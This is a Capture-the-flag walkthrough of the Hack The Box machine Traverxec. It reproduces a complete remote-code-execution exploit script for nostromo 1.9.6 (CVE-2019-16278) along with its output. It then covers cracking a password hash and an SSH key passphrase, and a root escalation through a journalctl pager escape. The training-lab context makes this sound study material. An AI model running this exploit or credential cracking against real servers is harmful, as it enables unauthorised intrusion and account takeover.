TL;DR
- Find the webserver version and exploit CVE on Nostromo
- Crack user’s hash and use directory transversal to retrieve private key
- Abuse journalctl to get root
User.txt
Reconnaissance
Let’s start by a Nmap scan:
magnussen@funcMyLife:~/traverxec$ nmap -sS -sV -sC -p- -vvv --min-rate 5000 --reason -oN traverxec.txt
Starting Nmap 7.60 ( https://nmap.org ) at 2020-02-18 21:24 CET
NSE: Loaded 146 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 21:24
Completed NSE at 21:24, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 21:24
Completed NSE at 21:24, 0.00s elapsed
Initiating Ping Scan at 21:24
Scanning 10.10.10.165 [4 ports]
Completed Ping Scan at 21:24, 0.23s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:24
Completed Parallel DNS resolution of 1 host. at 21:24, 0.04s elapsed
DNS resolution of 1 IPs took 0.04s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 21:24
Scanning 10.10.10.165 [65535 ports]
Discovered open port 80/tcp on 10.10.10.165
Discovered open port 22/tcp on 10.10.10.165
Increasing send delay for 10.10.10.165 from 0 to 5 due to 11 out of 19 dropped probes since last increase.
Increasing send delay for 10.10.10.165 from 5 to 10 due to 11 out of 18 dropped probes since last increase.
Completed SYN Stealth Scan at 21:24, 39.50s elapsed (65535 total ports)
Initiating Service scan at 21:24
Scanning 2 services on 10.10.10.165
Completed Service scan at 21:24, 6.51s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.10.165.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 21:24
Completed NSE at 21:24, 1.99s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 21:24
Completed NSE at 21:24, 0.00s elapsed
Nmap scan report for 10.10.10.165
Host is up, received echo-reply ttl 63 (0.035s latency).
Scanned at 2020-02-18 21:24:00 CET for 49s
Not shown: 65533 filtered ports
Reason: 65533 no-responses
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDVWo6eEhBKO19Owd6sVIAFVCJjQqSL4g16oI/DoFwUo+ubJyyIeTRagQNE91YdCrENXF2qBs2yFj2fqfRZy9iqGB09VOZt6i8oalpbmFwkBDtCdHoIAZbaZFKAl+m1UBell2v0xUhAy37Wl9BjoUU3EQBVF5QJNQqvb/mSqHsi5TAJcMtCpWKA4So3pwZcTatSu5x/RYdKzzo9fWSS6hjO4/hdJ4BM6eyKQxa29vl/ea1PvcHPY5EDTRX5RtraV9HAT7w2zIZH5W6i3BQvMGEckrrvVTZ6Ge3Gjx00ORLBdoVyqQeXQzIJ/vuDuJOH2G6E/AHDsw3n5yFNMKeCvNNL
| 256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLpsS/IDFr0gxOgk9GkAT0G4vhnRdtvoL8iem2q8yoRCatUIib1nkp5ViHvLEgL6e3AnzUJGFLI3TFz+CInilq4=
| 256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (EdDSA)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGJ16OMR0bxc/4SAEl1yiyEUxC3i/dFH7ftnCU7+P+3s
80/tcp open http syn-ack ttl 63 nostromo 1.9.6
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 21:24
Completed NSE at 21:24, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 21:24
Completed NSE at 21:24, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.85 seconds
Raw packets sent: 196637 (8.652MB) | Rcvd: 22 (952B)
So we find 2 useful services:
- OpenSSH (22)
- Apache (80)
The website is a single page website about a developer.
If we generate an error, we find the webserver version.
magnussen@funcMyLife:~/traverxec$ curl traverxec.htb/test
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>404 Not Found</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
</head>
<body>
<h1>404 Not Found</h1>
<hr>
<address>nostromo 1.9.6 at traverxec.htb Port 80</address>
</body>
</html>
Nostromo RCE
We can check for CVE in Nostromo 1.9.6.
We find the following script on ExploitDB:
#!/usr/bin/env python
# Exploit Title: nostromo 1.9.6 - Remote Code Execution
# Date: 2019-12-31
# Exploit Author: Kr0ff
# Vendor Homepage:
# Software Link: http://www.nazgul.ch/dev/nostromo-1.9.6.tar.gz
# Version: 1.9.6
# Tested on: Debian
# CVE : CVE-2019-16278
cve2019_16278.py
import sys
import socket
art = """
_____-2019-16278
_____ _______ ______ _____\ \
_____\ \_\ | | | / / | |
/ /| || / / /|/ / /___/|
/ / /____/||\ \ \ |/| |__ |___|/
| | |____|/ \ \ \ | | | \
| | _____ \| \| | | __/ __
|\ \|\ \ |\ /| |\ \ / \
| \_____\| | | \_______/ | | \____\/ |
| | /____/| \ | | / | | |____/|
\|_____| || \|_____|/ \|____| | |
|____|/ |___|/
"""
help_menu = '\r\nUsage: cve2019-16278.py <Target_IP> <Target_Port> <Command>'
def connect(soc):
response = ""
try:
while True:
connection = soc.recv(1024)
if len(connection) == 0:
break
response += connection
except:
pass
return response
def cve(target, port, cmd):
soc = socket.socket()
soc.connect((target, int(port)))
payload = 'POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\nContent-Length: 1\r\n\r\necho\necho\n{} 2>&1'.format(cmd)
soc.send(payload)
receive = connect(soc)
print(receive)
if __name__ == "__main__":
print(art)
try:
target = sys.argv[1]
port = sys.argv[2]
cmd = sys.argv[3]
cve(target, port, cmd)
except IndexError:
print(help_menu)
Let’s try it:
magnussen@funcMyLife:~/traverxec$ ./nostromo.py traverxec.htb 80 id
_____-2019-16278
_____ _______ ______ _____\ \
_____\ \_\ | | | / / | |
/ /| || / / /|/ / /___/|
/ / /____/||\ \ \ |/| |__ |___|/
| | |____|/ \ \ \ | | | \
| | _____ \| \| | | __/ __
|\ \|\ \ |\ /| |\ \ / \
| \_____\| | | \_______/ | | \____\/ |
| | /____/| \ | | / | | |____/|
\|_____| || \|_____|/ \|____| | |
|____|/ |___|/
HTTP/1.1 200 OK
Date: Tue, 18 Feb 2020 20:50:21 GMT
Server: nostromo 1.9.6
Connection: close
uid=33(www-data) gid=33(www-data) groups=33(www-data)
We now have a shell on the machine.
Crack user password and rsa passphrase
Let’s go deeper:
magnussen@funcMyLife:~/traverxec$ ./nostromo.py traverxec.htb 80 "ls -alh /var/"
drwxr-xr-x 12 root root 4.0K Oct 25 14:43 .
drwxr-xr-x 18 root root 4.0K Oct 25 14:17 ..
drwxr-xr-x 2 root root 4.0K Nov 12 06:25 backups
drwxr-xr-x 9 root root 4.0K Oct 25 14:34 cache
drwxr-xr-x 26 root root 4.0K Nov 12 04:56 lib
drwxrwsr-x 2 root staff 4.0K May 13 2019 local
lrwxrwxrwx 1 root root 9 Oct 25 14:15 lock -> /run/lock
drwxr-xr-x 5 root root 4.0K Feb 18 13:39 log
drwxrwsr-x 2 root mail 4.0K Oct 25 14:15 mail
drwxr-xr-x 6 root root 4.0K Oct 25 14:43 nostromo
drwxr-xr-x 2 root root 4.0K Oct 25 14:15 opt
lrwxrwxrwx 1 root root 4 Oct 25 14:15 run -> /run
drwxr-xr-x 4 root root 4.0K Oct 25 14:16 spool
drwxrwxrwt 3 root root 4.0K Feb 18 13:56 tmp
magnussen@funcMyLife:~/traverxec$ ./nostromo.py traverxec.htb 80 "ls -alh /var/nostromo"
drwxr-xr-x 6 root root 4.0K Oct 25 14:43 .
drwxr-xr-x 12 root root 4.0K Oct 25 14:43 ..
drwxr-xr-x 2 root daemon 4.0K Oct 27 16:12 conf
drwxr-xr-x 6 root daemon 4.0K Oct 25 17:11 htdocs
drwxr-xr-x 2 root daemon 4.0K Oct 25 14:43 icons
drwxr-xr-x 2 www-data daemon 4.0K Feb 18 15:11 logs
magnussen@funcMyLife:~/traverxec$ ./nostromo.py traverxec.htb 80 "ls -alh /var/nostromo/conf"
drwxr-xr-x 2 root daemon 4.0K Oct 27 16:12 .
drwxr-xr-x 6 root root 4.0K Oct 25 14:43 ..
-rw-r--r-- 1 root bin 41 Oct 25 15:20 .htpasswd
-rw-r--r-- 1 root bin 2.9K Oct 25 14:26 mimes
-rw-r--r-- 1 root bin 498 Oct 25 15:20 nhttpd.conf
magnussen@funcMyLife:~/traverxec$ ./nostromo.py traverxec.htb 80 "cat /var/nostromo/conf/.htpasswd"
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
magnussen@funcMyLife:~/traverxec$ ./nostromo.py traverxec.htb 80 "cat /var/nostromo/conf/nhttpd.conf"
# MAIN [MANDATORY]
servername traverxec.htb
serverlisten *
serveradmin david@traverxec.htb
serverroot /var/nostromo
servermimes conf/mimes
docroot /var/nostromo/htdocs
docindex index.html
# LOGS [OPTIONAL]
logpid logs/nhttpd.pid
# SETUID [RECOMMENDED]
user www-data
# BASIC AUTHENTICATION [OPTIONAL]
htaccess .htaccess
htpasswd /var/nostromo/conf/.htpasswd
# ALIASES [OPTIONAL]
/icons /var/nostromo/icons
# HOMEDIRS [OPTIONAL]
homedirs /home
homedirs_public public_www
magnussen@funcMyLife:~/traverxec$ ./nostromo.py 10.10.10.165 80 "ls -alh /home/"
total 12K
drwxr-xr-x 3 root root 4.0K Oct 25 14:32 .
drwxr-xr-x 18 root root 4.0K Oct 25 14:17 ..
drwx--x--x 6 david david 4.0K Feb 18 15:24 david
Ok, so we find a hash, we can crack it with hashcat
magnussen@funcMyLife:~/traverxec$ hashcat -m 500 -a 0 --force 'david_hash.txt' 'rockyou.txt' --show
$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/:Nowonly4me
As we saw in nhttpd.conf the home directory is /home and the public directory is public_www. We can list the files inside even if we can’t list the content of /home/david.
magnussen@funcMyLife:~/traverxec$ ./nostromo.py 10.10.10.165 80 "ls -alh /home/david/public_www/"
drwxr-xr-x 3 david david 4.0K Oct 25 15:45 .
drwx--x--x 6 david david 4.0K Feb 18 15:24 ..
-rw-r--r-- 1 david david 402 Oct 25 15:45 index.html
drwxr-xr-x 2 david david 4.0K Oct 25 17:02 protected-file-area
magnussen@funcMyLife:~/traverxec$ ./nostromo.py 10.10.10.165 80 "ls -alh /home/david/public_www/protected-file-area"
drwxr-xr-x 2 david david 4.0K Oct 25 17:02 .
drwxr-xr-x 3 david david 4.0K Oct 25 15:45 ..
-rw-r--r-- 1 david david 45 Oct 25 15:46 .htaccess
-rw-r--r-- 1 david david 1.9K Oct 25 17:02 backup-ssh-identity-files.tgz
We can recover the archive with zcat:
magnussen@funcMyLife:~/traverxec$ ./nostromo.py 10.10.10.165 80 "zcat /home/david/public_www/protected-file-area/backup-ssh-identity-files.tgz"
home/david/.ssh/0000700000175000017500000000000013554661372012712 5ustar daviddavidhome/david/.ssh/authorized_keys0000644000175000017500000000061513554661372016062 0ustar daviddavidssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCsXrsMQc0U71GVXMQcTOYIH2ZvCwpxTxN1jOYbTutvNyYThEIjYpCVs5DKhZi2rNunI8Z+Ey/FC9bpmCiJtao0xxIbJ02c+H6q13aAFrTv61GAzi5neX4Lj2E/pIhd3JBFYRIQw97C66MO3UVqxKcnGrCvYnhJvKMw7nSRI/cXTPHAEnwU0+NW2zBKId8cRRLxGFyM49pjDZPsAVgGlfdBD380vVa9dMrJ/T13vDTZZGoDgcq9gRtD1B6NJoLHaRWH4ikRuQvLWjk3nWDDaRjw6MxmRtLk8h0MM7+IiBYc6NJvbQzpG5M5oM0FvhawQetN71KcZ4jUVxN3m+YkaqHD david@traverxec
home/david/.ssh/id_rsa0000600000175000017500000000334613554661335014105 0ustar daviddavid
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,477EEFFBA56F9D283D349033D5D08C4F
seyeH/feG19TlUaMdvHZK/2qfy8pwwdr9sg75x4hPpJJ8YauhWorCN4LPJV+wfCG
tuiBPfZy+ZPklLkOneIggoruLkVGW4k4651pwekZnjsT8IMM3jndLNSRkjxCTX3W
KzW9VFPujSQZnHM9Jho6J8O8LTzl+s6GjPpFxjo2Ar2nPwjofdQejPBeO7kXwDFU
RJUpcsAtpHAbXaJI9LFyX8IhQ8frTOOLuBMmuSEwhz9KVjw2kiLBLyKS+sUT9/V7
HHVHW47Y/EVFgrEXKu0OP8rFtYULQ+7k7nfb7fHIgKJ/6QYZe69r0AXEOtv44zIc
Y1OMGryQp5CVztcCHLyS/9GsRB0d0TtlqY2LXk+1nuYPyyZJhyngE7bP9jsp+hec
dTRqVqTnP7zI8GyKTV+KNgA0m7UWQNS+JgqvSQ9YDjZIwFlA8jxJP9HsuWWXT0ZN
6pmYZc/rNkCEl2l/oJbaJB3jP/1GWzo/q5JXA6jjyrd9xZDN5bX2E2gzdcCPd5qO
xwzna6js2kMdCxIRNVErnvSGBIBS0s/OnXpHnJTjMrkqgrPWCeLAf0xEPTgktqi1
Q2IMJqhW9LkUs48s+z72eAhl8naEfgn+fbQm5MMZ/x6BCuxSNWAFqnuj4RALjdn6
i27gesRkxxnSMZ5DmQXMrrIBuuLJ6gHgjruaCpdh5HuEHEfUFqnbJobJA3Nev54T
fzeAtR8rVJHlCuo5jmu6hitqGsjyHFJ/hSFYtbO5CmZR0hMWl1zVQ3CbNhjeIwFA
bzgSzzJdKYbGD9tyfK3z3RckVhgVDgEMFRB5HqC+yHDyRb+U5ka3LclgT1rO+2so
uDi6fXyvABX+e4E4lwJZoBtHk/NqMvDTeb9tdNOkVbTdFc2kWtz98VF9yoN82u8I
Ak/KOnp7lzHnR07dvdD61RzHkm37rvTYrUexaHJ458dHT36rfUxafe81v6l6RM8s
9CBrEp+LKAA2JrK5P20BrqFuPfWXvFtROLYepG9eHNFeN4uMsuT/55lbfn5S41/U
rGw0txYInVmeLR0RJO37b3/haSIrycak8LZzFSPUNuwqFcbxR8QJFqqLxhaMztua
4mOqrAeGFPP8DSgY3TCloRM0Hi/MzHPUIctxHV2RbYO/6TDHfz+Z26ntXPzuAgRU
/8Gzgw56EyHDaTgNtqYadXruYJ1iNDyArEAu+KvVZhYlYjhSLFfo2yRdOuGBm9AX
JPNeaxw0DX8UwGbAQyU0k49ePBFeEgQh9NEcYegCoHluaqpafxYx2c5MpY1nRg8+
XBzbLF9pcMxZiAWrs4bWUqAodXfEU6FZv7dsatTa9lwH04aj/5qxEbJuwuAuW5Lh
hORAZvbHuIxCzneqqRjS4tNRm0kF9uI5WkfK1eLMO3gXtVffO6vDD3mcTNL1pQuf
SP0GqvQ1diBixPMx+YkiimRggUwcGnd3lRBBQ2MNwWt59Rri3Z4Ai0pfb1K7TvOM
j1aQ4bQmVX8uBoqbPvW0/oQjkbCvfR4Xv6Q+cba/FnGNZxhHR8jcH80VaNS469tt
VeYniFU/TGnRKDYLQH2x0ni1tBf0wKOLERY0CbGDcquzRoWjAmTN/PV2VbEKKD/w
-----END RSA PRIVATE KEY-----
home/david/.ssh/id_rsa.pub0000644000175000017500000000061513554661364014700 0ustar daviddavidssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCsXrsMQc0U71GVXMQcTOYIH2ZvCwpxTxN1jOYbTutvNyYThEIjYpCVs5DKhZi2rNunI8Z+Ey/FC9bpmCiJtao0xxIbJ02c+H6q13aAFrTv61GAzi5neX4Lj2E/pIhd3JBFYRIQw97C66MO3UVqxKcnGrCvYnhJvKMw7nSRI/cXTPHAEnwU0+NW2zBKId8cRRLxGFyM49pjDZPsAVgGlfdBD380vVa9dMrJ/T13vDTZZGoDgcq9gRtD1B6NJoLHaRWH4ikRuQvLWjk3nWDDaRjw6MxmRtLk8h0MM7+IiBYc6NJvbQzpG5M5oM0FvhawQetN71KcZ4jUVxN3m+YkaqHD david@traverxec
It’s time to crack the private key’s passphrase with JohnTheRipper!
magnussen@funcMyLife:~/traverxec$ ./JohnTheRipper/run/ssh2john.py david_private_key.txt > crack_david.txt
magnussen@funcMyLife:~/traverxec$ ./JohnTheRipper/run/john --wordlist=rockyou.txt crack_david.txt
Warning: detected hash type "SSH", but the string is also recognized as "ssh-opencl"
Use the "--format=ssh-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter (david_private_key.txt)
1g 0:00:00:03 DONE (2020-02-18 22:07) 0.2710g/s 3886Kp/s 3886Kc/s 3886KC/s ¡Vamos!
Session completed
We have everything we need to connect to the server with SSH.
magnussen@funcMyLife:~/traverxec$ ssh -i david_private_key.txt david@traverxec.htb
david@traverxec:~$ id
uid=1000(david) gid=1000(david) groups=1000(david),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
david@traverxec:~$ ls -alh
total 44K
drwx--x--x 6 david david 4.0K Feb 18 15:24 .
drwxr-xr-x 3 root root 4.0K Oct 25 14:32 ..
lrwxrwxrwx 1 root root 9 Oct 25 16:15 .bash_history -> /dev/null
-rw-r--r-- 1 david david 220 Oct 25 14:32 .bash_logout
-rw-r--r-- 1 david david 3.5K Oct 25 14:32 .bashrc
-rw------- 1 david david 130 Feb 18 15:19 .lesshst
drwxr-xr-x 3 david david 4.0K Feb 18 15:24 .local
-rw-r--r-- 1 david david 807 Oct 25 14:32 .profile
drwx------ 2 david david 4.0K Oct 25 17:02 .ssh
drwx------ 2 david david 4.0K Feb 18 15:08 bin
drwxr-xr-x 3 david david 4.0K Oct 25 15:45 public_www
-r--r----- 1 root david 33 Oct 25 16:14 user.txt
david@traverxec:~$ cat user.txt
7db0b48469606a42cec20750d9782f3d
I AM ROOT
Journalctl abuse
Let’s see how we can get root, let’s start by looking in the bin directory:
david@traverxec:~/bin$ ls -alh
total 20K
-rw-r--r-- 1 david david 621 Feb 18 15:08 -pager
drwx------ 2 david david 4.0K Feb 18 15:08 .
drwx--x--x 6 david david 4.0K Feb 18 15:24 ..
-r-------- 1 david david 802 Oct 25 16:26 server-stats.head
-rwx------ 1 david david 363 Oct 25 16:26 server-stats.sh
david@traverxec:~/bin$ cat server-stats.sh
#!/bin/bash
cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat
Alright, journalctl is run with sudo, we can exploit that and get a shell as root!
david@traverxec:~$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Tue 2020-02-18 14:25:14 EST, end at Tue 2020-02-18 16:12:25 EST. --
Feb 18 16:00:54 traverxec sudo[18362]: pam_unix(sudo:auth): authentication failure; logname
Feb 18 16:00:56 traverxec sudo[18362]: pam_unix(sudo:auth): conversation failed
Feb 18 16:00:56 traverxec sudo[18362]: pam_unix(sudo:auth): auth could not identify passwor
Feb 18 16:00:56 traverxec sudo[18362]: www-data : command not allowed ; TTY=pts/15 ; PWD=/t
Feb 18 16:00:57 traverxec crontab[18424]: (www-data) LIST (www-data)
!/bin/sh
# /bin/bash
root@traverxec:/home/david# id
uid=0(root) gid=0(root) groups=0(root)
root@traverxec:~# cat /root/root.txt
9aa36a6d76f785dfd320a478f6e0d906
This was a nice box, not very difficult, but a good way to start on Hack The Box.